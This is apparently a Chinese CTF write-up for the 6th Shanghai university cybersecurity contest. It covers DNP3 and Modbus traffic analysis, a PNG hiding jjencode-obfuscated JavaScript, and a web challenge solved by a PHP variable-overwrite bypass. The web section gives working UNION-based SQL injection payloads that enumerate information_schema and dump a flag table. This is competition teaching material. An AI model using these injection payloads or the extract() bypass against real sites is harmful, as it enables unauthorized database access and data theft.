第六届上海市大学生网络安全大赛

文章目录

MISC
- 0x00:签到
- 0x01:pcap
- 0x02:pcap analysis
- 0x03: 可乐加冰
Web
- 0x01:千毒网盘

MISC

0x00:签到

linux运行一下即可得到flag

0x01:pcap

提示:请分析附件中的dnp3协议

具体的协议介绍可以看师傅的博客
DNP3协议解析 —— 利用Wireshark对报文逐字节进行解析详细解析DNP3所含功能码
工控安全入门（四）—— DNP3协议
一开始以为出题考察的是read，在找参数object，以及File Data

但协议中并未出现，后来问学长才知道一般考察这类工控题，基本都是以流量包的形式考察的因为有些环境没有办法在线上提供，考察的还是传统的ctf,只不过是换了工控协议

可以总结下flag、fl、f各种编码，把数据包的内容分长度不同进行查看，有的时候这类题目考察的就是眼力。

这道题的flag便隐藏在每个长度为91的dnp3流量包中，按照顺序进行拼接即可

0x02:pcap analysis

这题上去也被秒了，就不用去看协议了，肯定还是把flag隐藏在流量包中，提示了让去看Modbus协议，直接过滤查看，打开第一个流量包即可看到flag

0x03: 可乐加冰

给了一个PNG照片，试了很多常见的隐写都没有发现线索，后来队里的qwzf拿到了一血，tql,复现一下，也学习学习。

binwalk分析一下，有zlib 之前都没怎么注意过,也可以看一下2018全国大学生信息安全竞赛 picture，也是考察zlib

5B.zilb和2AE96.zlib并没有什么异常

再来看看2AE96

有些奇怪，复制出来

内容不是十六进制，是十进制，写个简单的脚本转换一下

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:1emon
if __name__ == '__main__':data = ''with open("1.txt",'r',encoding='utf-8') as fp:strings = fp.read()lists = strings.split(' ')# print(list)for list in lists:data=data+chr(int(list))print(data)

S.$$$_+S.$__$+S.___+S.__$+S.$$$$+S.$$$_+S.$__$+S.__$+"-"+S.$_$$+S.$_$_+S.$$_$+S.$$_+"-"+S.$__+S.$_$_+S.$$$$+S.$$$+"-"+S.$__$+S.$__$+S.$$_+S._$$+"-"+S.$$_$+S.$_$_+S.$$_$+S.$___+S.__$+S._$_+S.$$$$+S.$_$+S.$$_+S._$_+S.$__+S.$$_$

翻之前的资料，发现和jjencode特别像，只不过含有S，把S替换成$再试一下

$.$$$_+$.$__$+$.___+$.__$+$.$$$$+$.$$$_+$.$__$+$.__$+"-"+$.$_$$+$.$_$_+$.$$_$+$.$$_+"-"+$.$__+$.$_$_+$.$$$$+$.$$$+"-"+$.$__$+$.$__$+$.$$_+$._$$+"-"+$.$$_$+$.$_$_+$.$$_$+$.$___+$.__$+$._$_+$.$$$$+$.$_$+$.$$_+$._$_+$.$__+$.$$_$

但发现解不了，查看了jjencode的作者提供的编码测试页，发现需要套上alert，它的格式是固定的

alert("")

alert('1emon')

知道规律了，把上面得到的内容复制进去即可,前后连接的+号不能忘

$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\""+$.$$$_+$.$__$+$.___+$.__$+$.$$$$+$.$$$_+$.$__$+$.__$+"-"+$.$_$$+$.$_$_+$.$$_$+$.$$_+"-"+$.$__+$.$_$_+$.$$$$+$.$$$+"-"+$.$__$+$.$__$+$.$$_+$._$$+"-"+$.$$_$+$.$_$_+$.$$_$+$.$___+$.__$+$._$_+$.$$$$+$.$_$+$.$$_+$._$_+$.$__+$.$$_$+"\\\")"+"\"")())();

Web

0x01:千毒网盘

这个题有源码泄露

http://eci-2ze636qtsw50d6niueft.cloudeci1.ichunqiu.com/www.zip

在code.php文件中发现sql语句，做题的时候没有观察到index.php文件中的变量覆盖，一直以为是要绕过单引号，然后进行SQL注入得到flag。

这题路没走通只能去看index.php页面，发现

查了下发现和之前的一道CTF比较类似，考察的是变量覆盖

foreach(array_expression as $value) 遍历给定的 array_expression 数组。每次循环中，当前单元的值被赋给 $value 并且数组内部的指针向前移一步
foreach(array_expression as $key => $value) 除了当前单元的值以外，键值也会在每次循环中被赋给变量 $key

本地测试一下：

第一层foreach里，$__key就是_GET, _POST, _COOKIE,加上一个$就变为$_GET, $_POST, $_COOKIE

<?php
foreach(array('_GET','_POST','_COOKIE') as $key){
echo "\$\$key<br>";
print_r($$key);
echo "<br>";
foreach($$key as $key_2 => $value_2) {echo "\$\$key_2<br>"; print_r($$key_2);echo "<br>";echo "\$value_2<br>";print_r($value_2);echo "<br>";        var_dump($$key_2==$value_2);echo "<br>";        }
}

第一次循环如果是以_GET传入的话，最终得到的结果是false,试试以_POST传入

unset($$__key2)把$_POST变量销毁了，所以就不会触发filter函数，因为还没进waf函数POST就被unset了

接下来继续执行

if($_GET) extract($_GET, EXTR_SKIP);
if($_POST) extract($_POST, EXTR_SKIP);

执行之后$_POST变量就又回来了，可以在本地测试一下

<?php
foreach(array('_GET', '_POST') as $key) {if($$key) { foreach($$key as $key_2 => $value_2) { if(isset($$key_2) && $$key_2 == $value_2) unset($$key_2); }}}
echo "before<br>";
echo "GET:<br>";
var_dump($_GET);
echo "<br>";
echo "POST:<br>";
var_dump($_POST);
echo "<br>";if($_GET) extract($_GET, EXTR_SKIP);
if($_POST) extract($_POST, EXTR_SKIP);echo "<br>";
echo "<br>";
echo "after<br>";
echo "POST:<br>";
var_dump($_POST);

执行extract（）之前，$_GET数组的键名是_POST，$_POST数组则不存在,$_GET数组的键名是_POST,所以也就是导入了名为_POST的变量，也就是$_POST变量，所以$_POST成功被还原

接下来测试一下payload，发现可以绕过去

使用联合查询注入方式看看,判断列数

?_POST[code]=114514' order by 4%23
DATA:
code=114514' order by 4%23

爆数据表

爆出字段值

?_POST[code]=114514' and 0=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'%23
DATA:
code=114514' and 0=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'%23

爆值

?_POST[code]=114514' and 0=1 union select 1,2,flag from flag%23
DATA:
code=114514' and 0=1 union select 1,2,flag from flag%23